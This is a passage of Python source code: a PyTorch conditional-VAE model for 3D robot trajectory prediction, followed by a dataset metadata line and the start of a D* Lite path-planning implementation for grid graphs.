not None:\n for annealed_var in self.annealed_vars:\n if rgetattr(self, annealed_var) is not None:\n self.log_writer.add_scalar('%s/%s' % (str(), annealed_var.replace('.', '/')),\n rgetattr(self, annealed_var), self.curr_iter)\n\n def obtain_encoded_tensors(self,\n mode,\n inputs,\n inputs_st,\n labels,\n labels_st,\n first_history_indices) -> torch.Tensor:\n \"\"\"\n Encodes input and output tensors for node.\n\n :param mode: Mode in which the model is operated. E.g. 
Train, Eval, Predict.\n :param inputs: Input tensor including the state for each agent over time [bs, t, state].\n :param inputs_st: Standardized input tensor.\n :param labels: Label tensor including the label output for each agent over time [bs, t, pred_state].\n :param labels_st: Standardized label tensor.\n :param first_history_indices: First timestep (index) in scene for which data is available for a node [bs]\n :return: tuple(x, y_e, y, n_s_t0)\n WHERE\n - x: Encoded input / condition tensor to the CVAE x_e.\n - y_e: Encoded label / future of the node.\n - y: Label / future of the node.\n - n_s_t0: Standardized current state of the node.\n \"\"\"\n\n x, y_e, y = None, None, None\n initial_dynamics = dict()\n\n batch_size = inputs.shape[0]\n\n #########################################\n # Provide basic information to encoders #\n #########################################\n node_history = inputs\n node_present_state = inputs[:, -1]\n node_pos = inputs[:, -1, 0:3]\n node_vel = inputs[:, -1, 3:6]\n\n node_history_st = inputs_st\n node_present_state_st = inputs_st[:, -1]\n node_pos_st = inputs_st[:, -1, 0:3]\n node_vel_st = inputs_st[:, -1, 3:6]\n\n n_s_t0 = node_present_state_st\n\n initial_dynamics['pos'] = node_pos\n initial_dynamics['vel'] = node_vel\n\n self.dynamic.set_initial_condition(initial_dynamics)\n\n ##################\n # Encode History #\n ##################\n node_history_encoded = self.encode_node_history(mode,\n node_history_st,\n first_history_indices)\n\n ##################\n # Encode Present #\n ##################\n node_present = node_present_state_st # [bs, state_dim]\n\n ##################\n # Encode Future #\n ##################\n if mode != ModeKeys.PREDICT:\n y = labels_st\n\n\n ######################################\n # Concatenate Encoder Outputs into x #\n ######################################\n x_concat_list = list()\n\n # Every node has a history encoder.\n x_concat_list.append(node_history_encoded) # [bs/nbs, enc_rnn_dim_history]\n\n x = torch.cat(x_concat_list, dim=1)\n\n if mode == ModeKeys.TRAIN or mode == ModeKeys.EVAL:\n y_e = self.encode_node_future(mode, node_present, y)\n\n return x, y_e, y, n_s_t0\n\n def encode_node_history(self, mode, node_hist, first_history_indices):\n \"\"\"\n Encodes the nodes history.\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param node_hist: Historic and current state of the node. [bs, mhl, state]\n :param first_history_indices: First timestep (index) in scene for which data is available for a node [bs]\n :return: Encoded node history tensor. [bs, enc_rnn_dim]\n \"\"\"\n outputs, _ = run_lstm_on_variable_length_seqs(self.node_modules['/node_history_encoder'],\n original_seqs=node_hist,\n lower_indices=first_history_indices)\n\n outputs = F.dropout(outputs,\n p=1. - self.hyperparams['rnn_kwargs']['dropout_keep_prob'],\n training=(mode == ModeKeys.TRAIN)) # [bs, max_time, enc_rnn_dim]\n\n last_index_per_sequence = -(first_history_indices + 1)\n\n return outputs[torch.arange(first_history_indices.shape[0]), last_index_per_sequence]\n\n def encode_node_future(self, mode, node_present, node_future) -> torch.Tensor:\n \"\"\"\n Encodes the node future (during training) using a bi-directional LSTM\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param node_present: Current state of the node. [bs, state]\n :param node_future: Future states of the node. 
[bs, ph, state]\n :return: Encoded future.\n \"\"\"\n initial_h_model = self.node_modules['/node_future_encoder/initial_h']\n initial_c_model = self.node_modules['/node_future_encoder/initial_c']\n\n # Here we're initializing the forward hidden states,\n # but zeroing the backward ones.\n initial_h = initial_h_model(node_present)\n initial_h = torch.stack([initial_h, torch.zeros_like(initial_h, device=self.device)], dim=0)\n\n initial_c = initial_c_model(node_present)\n initial_c = torch.stack([initial_c, torch.zeros_like(initial_c, device=self.device)], dim=0)\n\n initial_state = (initial_h, initial_c)\n\n _, state = self.node_modules['/node_future_encoder'](node_future, initial_state)\n state = unpack_RNN_state(state)\n state = F.dropout(state,\n p=1. - self.hyperparams['rnn_kwargs']['dropout_keep_prob'],\n training=(mode == ModeKeys.TRAIN))\n\n return state\n\n\n def q_z_xy(self, mode, x, y_e) -> torch.Tensor:\n r\"\"\"\n .. math:: q_\\phi(z \\mid \\mathbf{x}_i, \\mathbf{y}_i)\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param x: Input / Condition tensor.\n :param y_e: Encoded future tensor.\n :return: Latent distribution of the CVAE.\n \"\"\"\n xy = torch.cat([x, y_e], dim=1)\n\n if self.hyperparams['q_z_xy_MLP_dims'] is not None:\n dense = self.node_modules['/q_z_xy']\n h = F.dropout(F.relu(dense(xy)),\n p=1. - self.hyperparams['MLP_dropout_keep_prob'],\n training=(mode == ModeKeys.TRAIN))\n\n else:\n h = xy\n\n to_latent = self.node_modules['/hxy_to_z']\n return self.latent.dist_from_h(to_latent(h), mode)\n\n def p_z_x(self, mode, x):\n r\"\"\"\n .. math:: p_\\theta(z \\mid \\mathbf{x}_i)\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param x: Input / Condition tensor.\n :return: Latent distribution of the CVAE.\n \"\"\"\n if self.hyperparams['p_z_x_MLP_dims'] is not None:\n dense = self.node_modules['/p_z_x']\n h = F.dropout(F.relu(dense(x)),\n p=1. - self.hyperparams['MLP_dropout_keep_prob'],\n training=(mode == ModeKeys.TRAIN))\n\n else:\n h = x\n\n to_latent = self.node_modules['/hx_to_z']\n return self.latent.dist_from_h(to_latent(h), mode)\n\n def project_to_GMM_params(self, tensor) -> torch.Tensor:\n \"\"\"\n Projects tensor to parameters of a GMM with N components and D dimensions.\n\n :param tensor: Input tensor.\n :return: tuple(log_pis, mus, log_sigmas, corrs)\n WHERE\n - log_pis: Weight (logarithm) of each GMM component. [N]\n - mus: Mean of each GMM component. [N, D]\n - log_sigmas: Standard Deviation (logarithm) of each GMM component. [N, D]\n - corrs: Correlation between the GMM components. [N]\n \"\"\"\n log_pis = self.node_modules['/decoder/proj_to_GMM_log_pis'](tensor)\n mus = self.node_modules['/decoder/proj_to_GMM_mus'](tensor)\n log_sigmas = self.node_modules['/decoder/proj_to_GMM_log_sigmas'](tensor)\n corrs = torch.tanh(self.node_modules['/decoder/proj_to_GMM_corrs'](tensor))\n return log_pis, mus, log_sigmas, corrs\n\n def p_y_xz(self, mode, x, n_s_t0, z_stacked, prediction_horizon,\n num_samples, num_components=1, gmm_mode=False):\n r\"\"\"\n .. math:: p_\\psi(\\mathbf{y}_i \\mid \\mathbf{x}_i, z)\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param x: Input / Condition tensor.\n :param y: Future tensor.\n :param n_s_t0: Standardized current state of the node.\n :param z_stacked: Stacked latent state. 
[num_samples_z * num_samples_gmm, bs, latent_state]\n :param prediction_horizon: Number of prediction timesteps.\n :param num_samples: Number of samples from the latent space.\n :param num_components: Number of GMM components.\n :param gmm_mode: If True: The mode of the GMM is sampled.\n :return: GMM3D. If mode is Predict, also samples from the GMM.\n \"\"\"\n ph = prediction_horizon\n pred_dim = self.pred_state_length\n\n z = torch.reshape(z_stacked, (-1, self.latent.z_dim))\n zx = torch.cat([z, x.repeat(num_samples * num_components, 1)], dim=1)\n\n cell = self.node_modules['/decoder/rnn_cell']\n initial_h_model = self.node_modules['/decoder/initial_h']\n\n initial_state = initial_h_model(zx)\n\n log_pis, mus, log_sigmas, corrs, a_sample = [], [], [], [], []\n\n # Infer initial action state for node from current state\n a_0 = self.node_modules['/decoder/state_action'](n_s_t0)\n\n state = initial_state\n\n input_ = torch.cat([zx, a_0.repeat(num_samples * num_components, 1)], dim=1)\n outputs = []\n\n for j in range(ph):\n h_state = cell(input_, state)\n log_pi_t, mu_t, log_sigma_t, corr_t = self.project_to_GMM_params(h_state)\n\n gmm = GMM3D(log_pi_t, mu_t, log_sigma_t, corr_t) # [k;bs, pred_dim]\n\n if mode == ModeKeys.PREDICT and gmm_mode:\n a_t = gmm.mode()\n else:\n a_t = gmm.rsample()\n\n if num_components > 1:\n if mode == ModeKeys.PREDICT:\n log_pis.append(self.latent.p_dist.logits.repeat(num_samples, 1, 1))\n else:\n log_pis.append(self.latent.q_dist.logits.repeat(num_samples, 1, 1))\n else:\n log_pis.append(\n torch.ones_like(corr_t[...,0].reshape(num_samples, num_components, -1).permute(0, 2, 1).reshape(-1, 1))\n )\n\n mus.append(\n mu_t.reshape(\n num_samples, num_components, -1, 3\n ).permute(0, 2, 1, 3).reshape(-1, 3 * num_components)\n )\n log_sigmas.append(\n log_sigma_t.reshape(\n num_samples, num_components, -1, 3\n ).permute(0, 2, 1, 3).reshape(-1, 3 * num_components))\n corrs.append(\n corr_t.reshape(\n num_samples, num_components, -1\n ).permute(0, 2, 1).reshape(-1, 3* num_components))\n\n\n # dec_inputs = [zx, mu_t]\n dec_inputs = [zx, a_t]\n outputs.append(a_t)\n input_ = torch.cat(dec_inputs, dim=1)\n state = h_state\n\n log_pis = torch.stack(log_pis, dim=1)\n mus = torch.stack(mus, dim=1)\n log_sigmas = torch.stack(log_sigmas, dim=1)\n corrs = torch.stack(corrs, dim=1)\n outputs = torch.stack(outputs,dim=1)\n\n a_dist = GMM3D(torch.reshape(log_pis, [num_samples, -1, ph, num_components]),\n torch.reshape(mus, [num_samples, -1, ph, num_components * pred_dim]),\n torch.reshape(log_sigmas, [num_samples, -1, ph, num_components * pred_dim]),\n torch.reshape(corrs, [num_samples, -1, ph, num_components, 3]))\n\n if self.hyperparams['dynamic']['distribution']:\n y_dist = self.dynamic.integrate_distribution(a_dist, x)\n else:\n y_dist = a_dist\n\n if mode == ModeKeys.PREDICT:\n if gmm_mode:\n a_sample = a_dist.mode()\n else:\n a_sample = a_dist.rsample() \n sampled_future = self.dynamic.integrate_samples(a_sample, x)\n return y_dist, sampled_future\n else:\n return y_dist, outputs\n \n def p_y_xz2z(self, mode, x, n_s_t0, z_stacked, z_T,\n num_samples, ph_limit=100, num_components=1, gmm_mode=False):\n r\"\"\"\n .. math:: p_\\psi(\\mathbf{y}_i \\mid \\mathbf{x}_i, z)\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param x: Input / Condition tensor.\n :param y: Future tensor.\n :param n_s_t0: Standardized current state of the node.\n :param z_stacked: Stacked latent state. 
[num_samples_z * num_samples_gmm, bs, latent_state]\n :param z_T: stop predicting at z_T\n :param num_samples: Number of samples from the latent space.\n :param num_components: Number of GMM components.\n :param gmm_mode: If True: The mode of the GMM is sampled.\n :return: GMM3D. If mode is Predict, also samples from the GMM.\n \"\"\"\n pred_dim = self.pred_state_length\n\n z = torch.reshape(z_stacked, (-1, self.latent.z_dim))\n zx = torch.cat([z, x.repeat(num_samples * num_components, 1)], dim=1)\n\n cell = self.node_modules['/decoder/rnn_cell']\n initial_h_model = self.node_modules['/decoder/initial_h']\n\n initial_state = initial_h_model(zx)\n\n log_pis, mus, log_sigmas, corrs, a_sample = [], [], [], [], []\n\n # Infer initial action state for node from current state\n a_0 = self.node_modules['/decoder/state_action'](n_s_t0)\n\n state = initial_state\n\n input_ = torch.cat([zx, a_0.repeat(num_samples * num_components, 1)], dim=1)\n outputs = []\n\n T = 1\n\n ph = 0\n while True:\n h_state = cell(input_, state)\n log_pi_t, mu_t, log_sigma_t, corr_t = self.project_to_GMM_params(h_state)\n\n gmm = GMM3D(log_pi_t, mu_t, log_sigma_t, corr_t) # [k;bs, pred_dim]\n\n if mode == ModeKeys.PREDICT and gmm_mode:\n a_t = gmm.mode()\n else:\n a_t = gmm.rsample()\n\n if num_components > 1:\n if mode == ModeKeys.PREDICT:\n log_pis.append(self.latent.p_dist.logits.repeat(num_samples, 1, 1))\n else:\n log_pis.append(self.latent.q_dist.logits.repeat(num_samples, 1, 1))\n else:\n log_pis.append(\n torch.ones_like(corr_t[...,0].reshape(num_samples, num_components, -1).permute(0, 2, 1).reshape(-1, 1))\n )\n\n mus.append(\n mu_t.reshape(\n num_samples, num_components, -1, 3\n ).permute(0, 2, 1, 3).reshape(-1, 3 * num_components)\n )\n log_sigmas.append(\n log_sigma_t.reshape(\n num_samples, num_components, -1, 3\n ).permute(0, 2, 1, 3).reshape(-1, 3 * num_components))\n corrs.append(\n corr_t.reshape(\n num_samples, num_components, -1\n ).permute(0, 2, 1).reshape(-1, 3* num_components))\n\n\n # dec_inputs = [zx, mu_t]\n dec_inputs = [zx, a_t]\n outputs.append(a_t)\n input_ = torch.cat(dec_inputs, dim=1)\n state = h_state\n ph += 1\n if ph > ph_limit:\n print(\"out ot ph_limit\")\n break\n if ph == 1:\n pos_mus = self.dynamic.initial_conditions['pos'].unsqueeze(1)[:, None].repeat(num_samples, 1, num_components, 1)\n else:\n pos_mus += mus[-1].reshape(num_samples, -1, num_components, pred_dim) * self.dynamic.dt\n if pos_mus[...,-1].mean() < z_T:\n break\n\n log_pis = torch.stack(log_pis, dim=1)\n mus = torch.stack(mus, dim=1)\n log_sigmas = torch.stack(log_sigmas, dim=1)\n corrs = torch.stack(corrs, dim=1)\n outputs = torch.stack(outputs,dim=1)\n\n a_dist = GMM3D(torch.reshape(log_pis, [num_samples, -1, ph, num_components]),\n torch.reshape(mus, [num_samples, -1, ph, num_components * pred_dim]),\n torch.reshape(log_sigmas, [num_samples, -1, ph, num_components * pred_dim]),\n torch.reshape(corrs, [num_samples, -1, ph, num_components, 3]))\n\n if self.hyperparams['dynamic']['distribution']:\n y_dist = self.dynamic.integrate_distribution2zT(a_dist, z_T)\n else:\n y_dist = a_dist\n\n if mode == ModeKeys.PREDICT:\n if gmm_mode:\n a_sample = a_dist.mode()\n else:\n a_sample = a_dist.rsample() \n sampled_future = self.dynamic.integrate_samples(a_sample, x)\n return y_dist, sampled_future\n else:\n return y_dist, outputs\n\n def encoder(self, mode, x, y_e, num_samples=None):\n \"\"\"\n Encoder of the CVAE.\n\n :param mode: Mode in which the model is operated. E.g. 
Train, Eval, Predict.\n :param x: Input / Condition tensor.\n :param y_e: Encoded future tensor.\n :param num_samples: Number of samples from the latent space during Prediction.\n :return: tuple(z, kl_obj)\n WHERE\n - z: Samples from the latent space.\n - kl_obj: KL Divergenze between q and p\n \"\"\"\n if mode == ModeKeys.TRAIN:\n sample_ct = self.hyperparams['k']\n elif mode == ModeKeys.EVAL:\n sample_ct = self.hyperparams['k_eval']\n elif mode == ModeKeys.PREDICT:\n sample_ct = num_samples\n if num_samples is None:\n raise ValueError(\"num_samples cannot be None with mode == PREDICT.\")\n\n self.latent.q_dist = self.q_z_xy(mode, x, y_e)\n self.latent.p_dist = self.p_z_x(mode, x)\n\n z = self.latent.sample_q(sample_ct, mode)\n\n if mode == ModeKeys.TRAIN:\n kl_obj = self.latent.kl_q_p(self.log_writer, '%s' % str(), self.curr_iter)\n if self.log_writer is not None:\n self.log_writer.add_scalar('%s/%s' % (str(), 'kl'), kl_obj, self.curr_iter)\n else:\n kl_obj = None\n\n return z, kl_obj\n\n def decoder(self, mode, x, y, n_s_t0, z, labels, prediction_horizon, num_samples):\n \"\"\"\n Decoder of the CVAE.\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param x: Input / Condition tensor.\n :param y: Future tensor.\n :param n_s_t0: Standardized current state of the node.\n :param z: Stacked latent state.\n :param prediction_horizon: Number of prediction timesteps.\n :param num_samples: Number of samples from the latent space.\n :return: Log probability of y over p.\n \"\"\"\n\n num_components = self.hyperparams['N'] * self.hyperparams['K']\n y_dist, outputs = self.p_y_xz(mode, x, n_s_t0, z,\n prediction_horizon, num_samples, num_components=num_components)\n log_p_yt_xz = torch.clamp(y_dist.log_prob(labels), max=self.hyperparams['log_p_yt_xz_max'])\n mseloss,_ = torch.min(torch.mean((outputs.reshape((-1,)+labels.shape) -labels.unsqueeze(0))**2,dim=(2,3)),dim=0)\n mseloss = mseloss.mean()\n # prob = (y_dist.log_pis/torch.sum(y_dist.log_pis,-1,keepdim=True)).unsqueeze(-1)\n # pred = torch.sum(prob*y_dist.mus,dim=-2).squeeze(0)\n # mse = torch.sqrt(torch.mean((labels - pred)**2,dim=-2)).mean(0).sum(0)\n \n if self.hyperparams['log_histograms'] and self.log_writer is not None:\n self.log_writer.add_histogram('%s/%s' % (str(), 'log_p_yt_xz'), log_p_yt_xz, self.curr_iter)\n\n log_p_y_xz = torch.sum(log_p_yt_xz, dim=2)\n return log_p_y_xz, mseloss\n\n def train_loss(self,\n inputs,\n inputs_st,\n first_history_indices,\n labels,\n labels_st,\n prediction_horizon) -> torch.Tensor:\n \"\"\"\n Calculates the training loss for a batch.\n\n :param inputs: Input tensor including the state for each agent over time [bs, t, state].\n :param inputs_st: Standardized input tensor.\n :param first_history_indices: First timestep (index) in scene for which data is available for a node [bs]\n :param labels: Label tensor including the label output for each agent over time [bs, t, pred_state].\n :param labels_st: Standardized label tensor.\n :param prediction_horizon: Number of prediction timesteps.\n :return: Scalar tensor -> nll loss\n \"\"\"\n mode = ModeKeys.TRAIN\n\n x, y_e, y, n_s_t0 = self.obtain_encoded_tensors(mode=mode,\n inputs=inputs,\n inputs_st=inputs_st,\n labels=labels,\n labels_st=labels_st,\n first_history_indices=first_history_indices)\n\n z, kl = self.encoder(mode, x, y_e)\n log_p_y_xz, mseloss = self.decoder(mode, x, y, n_s_t0, z,\n labels, # Loss is calculated on unstandardized label\n prediction_horizon,\n self.hyperparams['k'])\n\n log_p_y_xz_mean = 
torch.mean(log_p_y_xz, dim=0) # [nbs]\n log_likelihood = torch.mean(log_p_y_xz_mean)\n\n mutual_inf_q = mutual_inf_mc(self.latent.q_dist)\n mutual_inf_p = mutual_inf_mc(self.latent.p_dist)\n\n ELBO = log_likelihood - self.kl_weight * kl + 1. * mutual_inf_p\n loss = -ELBO + mseloss\n\n if self.hyperparams['log_histograms'] and self.log_writer is not None:\n self.log_writer.add_histogram('%s/%s' % (str(), 'log_p_y_xz'),\n log_p_y_xz_mean,\n self.curr_iter)\n\n if self.log_writer is not None:\n self.log_writer.add_scalar('%s/%s' % (str(), 'mutual_information_q'),\n mutual_inf_q,\n self.curr_iter)\n self.log_writer.add_scalar('%s/%s' % (str(), 'mutual_information_p'),\n mutual_inf_p,\n self.curr_iter)\n self.log_writer.add_scalar('%s/%s' % (str(), 'log_likelihood'),\n log_likelihood,\n self.curr_iter)\n self.log_writer.add_scalar('%s/%s' % (str(), 'loss'),\n loss,\n self.curr_iter)\n if self.hyperparams['log_histograms']:\n self.latent.summarize_for_tensorboard(self.log_writer, str(), self.curr_iter)\n return loss\n\n def eval_loss(self,\n inputs,\n inputs_st,\n first_history_indices,\n labels,\n labels_st,\n prediction_horizon) -> torch.Tensor:\n \"\"\"\n Calculates the evaluation loss for a batch.\n\n :param inputs: Input tensor including the state for each agent over time [bs, t, state].\n :param inputs_st: Standardized input tensor.\n :param first_history_indices: First timestep (index) in scene for which data is available for a node [bs]\n :param labels: Label tensor including the label output for each agent over time [bs, t, pred_state].\n :param labels_st: Standardized label tensor.\n :param prediction_horizon: Number of prediction timesteps.\n :return: tuple(nll_q_is, nll_p, nll_exact, nll_sampled)\n \"\"\"\n\n mode = ModeKeys.EVAL\n\n x, y_e, y, n_s_t0 = self.obtain_encoded_tensors(mode=mode,\n inputs=inputs,\n inputs_st=inputs_st,\n labels=labels,\n labels_st=labels_st,\n first_history_indices=first_history_indices)\n\n num_components = self.hyperparams['N'] * self.hyperparams['K']\n ### Importance sampled NLL estimate\n z, _ = self.encoder(mode, x, y_e) # [k_eval, nbs, N*K]\n z = self.latent.sample_p(1, mode, full_dist=True)\n y_dist, _ = self.p_y_xz(ModeKeys.PREDICT, x, n_s_t0, z,\n prediction_horizon, num_samples=1, num_components=num_components)\n # We use unstandardized labels to compute the loss\n log_p_yt_xz = torch.clamp(y_dist.log_prob(labels), max=self.hyperparams['log_p_yt_xz_max'])\n log_p_y_xz = torch.sum(log_p_yt_xz, dim=2)\n log_p_y_xz_mean = torch.mean(log_p_y_xz, dim=0) # [nbs]\n log_likelihood = torch.mean(log_p_y_xz_mean)\n nll = -log_likelihood\n\n return nll\n\n def predict(self,\n inputs,\n inputs_st,\n first_history_indices,\n prediction_horizon,\n num_samples,\n z_mode=False,\n gmm_mode=False,\n full_dist=True,\n all_z_sep=False,\n dist=False):\n \"\"\"\n Predicts the future of a batch of nodes.\n\n :param inputs: Input tensor including the state for each agent over time [bs, t, state].\n :param inputs_st: Standardized input tensor.\n :param first_history_indices: First timestep (index) in scene for which data is available for a node [bs]\n :param prediction_horizon: Number of prediction timesteps.\n :param num_samples: Number of samples from the latent space.\n :param z_mode: If True: Select the most likely latent state.\n :param gmm_mode: If True: The mode of the GMM is sampled.\n :param all_z_sep: Samples each latent mode individually without merging them into a GMM.\n :param full_dist: Samples all latent states and merges them into a GMM as output.\n 
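:param dist: If True: Return the predicted GMM3D distribution in addition to the sampled future.\n 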
:return:\n \"\"\"\n mode = ModeKeys.PREDICT\n\n x, _, _, n_s_t0 = self.obtain_encoded_tensors(mode=mode,\n inputs=inputs,\n inputs_st=inputs_st,\n labels=None,\n labels_st=None,\n first_history_indices=first_history_indices)\n\n self.latent.p_dist = self.p_z_x(mode, x)\n z, num_samples, num_components = self.latent.sample_p(num_samples,\n mode,\n most_likely_z=z_mode,\n full_dist=full_dist,\n all_z_sep=all_z_sep)\n\n y_dist, our_sampled_future = self.p_y_xz(mode, x, n_s_t0, z,\n prediction_horizon,\n num_samples,\n num_components,\n gmm_mode)\n if dist == True:\n return y_dist, our_sampled_future\n return our_sampled_future\n\n def predict2(self,\n inputs,\n inputs_st,\n first_history_indices,\n z_T,\n num_samples,\n z_mode=False,\n gmm_mode=False,\n full_dist=True,\n all_z_sep=False,\n dist=False,\n ph_limit=100):\n \"\"\"\n Predicts the future of a batch of nodes.\n\n :param inputs: Input tensor including the state for each agent over time [bs, t, state].\n :param inputs_st: Standardized input tensor.\n :param first_history_indices: First timestep (index) in scene for which data is available for a node [bs]\n :param prediction_horizon: Number of prediction timesteps.\n :param num_samples: Number of samples from the latent space.\n :param z_mode: If True: Select the most likely latent state.\n :param gmm_mode: If True: The mode of the GMM is sampled.\n :param all_z_sep: Samples each latent mode individually without merging them into a GMM.\n :param full_dist: Samples all latent states and merges them into a GMM as output.\n :return:\n \"\"\"\n mode = ModeKeys.PREDICT\n\n x, _, _, n_s_t0 = self.obtain_encoded_tensors(mode=mode,\n inputs=inputs,\n inputs_st=inputs_st,\n labels=None,\n labels_st=None,\n first_history_indices=first_history_indices)\n\n self.latent.p_dist = self.p_z_x(mode, x)\n z, num_samples, num_components = self.latent.sample_p(num_samples,\n mode,\n most_likely_z=z_mode,\n full_dist=full_dist,\n all_z_sep=all_z_sep)\n\n y_dist, our_sampled_future = self.p_y_xz2z(mode, x, n_s_t0, z,\n z_T,\n num_samples,\n ph_limit,\n num_components,\n gmm_mode)\n if dist == True:\n return y_dist, our_sampled_future\n return our_sampled_future\n \n def get_latent(self,\n inputs,\n inputs_st,\n first_history_indices,\n labels,\n labels_st,\n prediction_horizon) -> torch.Tensor:\n\n mode = ModeKeys.TRAIN\n\n x, _, _, n_s_t0 = self.obtain_encoded_tensors(mode=mode,\n inputs=inputs,\n inputs_st=inputs_st,\n labels=labels,\n labels_st=labels_st,\n first_history_indices=first_history_indices)\n return x\n","repo_name":"mousecpn/Robot-Trajectron","sub_path":"model/mgcvae.py","file_name":"mgcvae.py","file_ext":"py","file_size_in_byte":42484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"43234604310","text":"###############################################\n# D* Lite\n# Susan Fox\n# Spring 2016\n\n\"\"\"This file contains an implementation of D* Lite. Because of the different\\\npieces of this algorithm, and their need to access a lot of shared data, and\\\nthe way in which the algorithm must be restarted when new information comes in, it\nmade sense to make a class to contain the information. I have separated the outer loop, where\nit computes shortest path and then waits for new information, into external functions. 
The purpose of\nthe class is to contain the information that is generated, including the priority queue,\nand to respond with methods that implement the key features of the algorithm.\"\"\"\n\nimport random\nfrom FoxQueue import Queue, PriorityQueue\nimport time\nimport math\n\n\nclass DStarAlgorithm:\n\n def __init__(self, graph, startVert, goalVert):\n \"\"\"Takes in a graph, start vertex and goal vertex, and sets up the D* Lite\n search, initializing all the data structures and the priority queue.\"\"\"\n self.graph = graph\n self.startVert = startVert\n self.goalVert = goalVert\n self.maxVal = 1000\n\n self.rhs = {}\n self.pred = {}\n self.g = {}\n self.u = None\n\n self.initialize()\n\n def initialize(self):\n \"\"\"The Initialize algorithm from the pseudocode.\"\"\"\n self.u = PriorityQueue()\n vertices = self.graph.getVertices()\n for vert in vertices:\n self.rhs[vert] = self.maxVal\n self.g[vert] = self.maxVal\n self.rhs[self.startVert] = 0\n self.u.insert(priority=self.calculateKey(\n self.startVert), val=self.startVert)\n\n def computeShortestPath(self):\n \"\"\"The ComputeShortestPath algorithm from the pseudocode.\"\"\"\n while (not self.u.isEmpty()) and (self.compareKeys(self.u.firstElement()[0], self.calculateKey(self.goalVert))) or (self.rhs[self.goalVert] != self.g[self.goalVert]):\n # The first element has the form (priority, value)\n # print(\"=====> \", self.u.firstElement())\n vert = self.u.firstElement()[1]\n # print(vert)\n\n self.u.delete()\n\n if self.g[vert] > self.rhs[vert]:\n self.g[vert] = self.rhs[vert]\n else:\n self.g[vert] = self.maxVal\n self.updateVertex(vert)\n\n vertNeighbors = self.graph.getNeighbors(vert)\n # Get neighbor returns a list in the form of (vert, weight)\n for v in vertNeighbors:\n # Using v[0] to only take out the vert, not with the weight\n # print(\"====>\", v)\n v = v[0]\n self.updateVertex(v)\n return self.reconstructPath()\n\n def updateVertex(self, vert):\n \"\"\"The UpdateVertex algorithm from the pseudocode.\"\"\"\n if vert != self.startVert:\n self.rhs[vert] = self.minNeighCost(vert)\n if self.u.contains(vert):\n self.u.removeValue(value=vert)\n if self.g[vert] != self.rhs[vert]:\n self.u.insert(self.calculateKey(vert), vert)\n # print(self.u)\n\n def minNeighCost(self, vert):\n \"\"\"A helper to compute the new rhs value, by finding the minimum cost among\n all the neighbors of a vertex. The cost is computed as the g cost of the\n neighbor plus the edge cost between the neighbor and the vertex.\"\"\"\n minNCost = self.maxVal\n minVert = -1\n for neighInfo in self.graph.getNeighbors(vert):\n neigh = neighInfo[0]\n edgeCost = neighInfo[1]\n newCost = self.g[neigh] + edgeCost\n if newCost < minNCost:\n minNCost = newCost\n minVert = neigh\n return minNCost\n\n def calculateKey(self, vert):\n \"\"\"The CalculateKey algorithm from the pseudocode.\"\"\"\n minG = min(self.g[vert], self.rhs[vert])\n heurCost = self.graph.heuristicDist(vert, self.goalVert)\n return [minG + heurCost, minG]\n\n def compareKeys(self, key1, key2):\n \"\"\"Takes in two keys, each of which is a list containing f cost\n and g cost. It prefers the lower f cost, but for equal f costs\n it chooses the lower g cost.\"\"\"\n [f1, g1] = key1\n [f2, g2] = key2\n return (f1 < f2) or ((f1 == f2) and (g1 < g2))\n\n def correctInformation(self, newInfo):\n \"\"\"Takes in a dictionary whose keys are (r, c) tuples, and the value\n is the newly corrected cell weight. 
Updates the graph, and then updates\n the search information appropriately.\"\"\"\n for (r, c) in newInfo:\n self.graph.setCellValue(r, c, newInfo[r, c])\n self.graph.graphFromGrid()\n for (r, c) in newInfo:\n nodeNum = r * self.graph.getWidth() + c\n #print(\"(\", r, c, \")\", nodeNum)\n self.updateVertex(nodeNum)\n neighs = self.graph.getNeighbors(nodeNum)\n for (nextNeigh, wgt) in neighs:\n self.updateVertex(nextNeigh)\n\n def reconstructPath(self):\n \"\"\" Given the start vertex and goal vertex, and the table of\n predecessors found during the search, this will reconstruct the path\n from start to goal\"\"\"\n\n path = [self.goalVert]\n currVert = self.goalVert\n while currVert != self.startVert:\n currVert = self._pickMinNeighbor(currVert)\n path.insert(0, currVert)\n return path\n\n def _pickMinNeighbor(self, vert):\n \"\"\"A helper to path-reconstruction that finds the neighbor of a vertex\n that has the minimum g cost.\"\"\"\n neighs = self.graph.getNeighbors(vert)\n minVal = self.maxVal\n minNeigh = None\n for [neigh, cost] in neighs:\n if self.g[neigh] < minVal:\n minVal = self.g[neigh]\n minNeigh = neigh\n return minNeigh\n\n\n# ---------------------------------------------------------------\ndef DStarRoute(graph, startVert, goalVert):\n \"\"\" This algorithm searches a graph using D* Lite looking for a path from\n some start vertex to some goal vertex It uses a queue to store the\n indices of vertices that it still needs to examine. This version of D*\n Lite is equivalent to A*, because the information used in the search is\n all accurate.\"\"\"\n\n dStarRunner = DStarAlgorithm(graph, startVert, goalVert)\n route = dStarRunner.computeShortestPath()\n return route\n\n\ndef DStarGlobal(graph, startVert, goalVert, percWrong=20):\n \"\"\"This algorithm search a graph using D* Lite for\n a path from some start to some goal. It simulates incorrect\n information about the world by modifying percWrong percent\n of the cells in the graph to have a different value. Then,\n after the first route is generated, the correct data is\n provided to the DStarLite object, and it updates its route.\"\"\"\n if graph.__class__.__name__ != \"GridGraph\":\n print(\"DStarGlobal only works on Grid Graphs, try again.\")\n return\n correctInfo, incorrectGraph = corruptGraph(graph, percWrong)\n # print(\"CORRUPTED GRAPH:\")\n # incorrectGraph.printGrid()\n dStarRunner = DStarAlgorithm(incorrectGraph, startVert, goalVert)\n t1 = time.time()\n route1 = dStarRunner.computeShortestPath()\n t2 = time.time()\n print(\"First route found is:\")\n print(route1)\n print(\"Time elapsed:\", t2 - t1)\n # graph.printWithRoute(route1)\n\n # print(\"--------\")\n # print(\"CORRECT MAP:\")\n # graph.printGrid()\n print(\"Correcting information...\")\n dStarRunner.correctInformation(correctInfo)\n\n t1 = time.time()\n route2 = dStarRunner.computeShortestPath()\n t2 = time.time()\n if route1 == route2:\n print(\"SAME ROUTE\")\n print(\"Fixed route found is:\")\n print(route2)\n 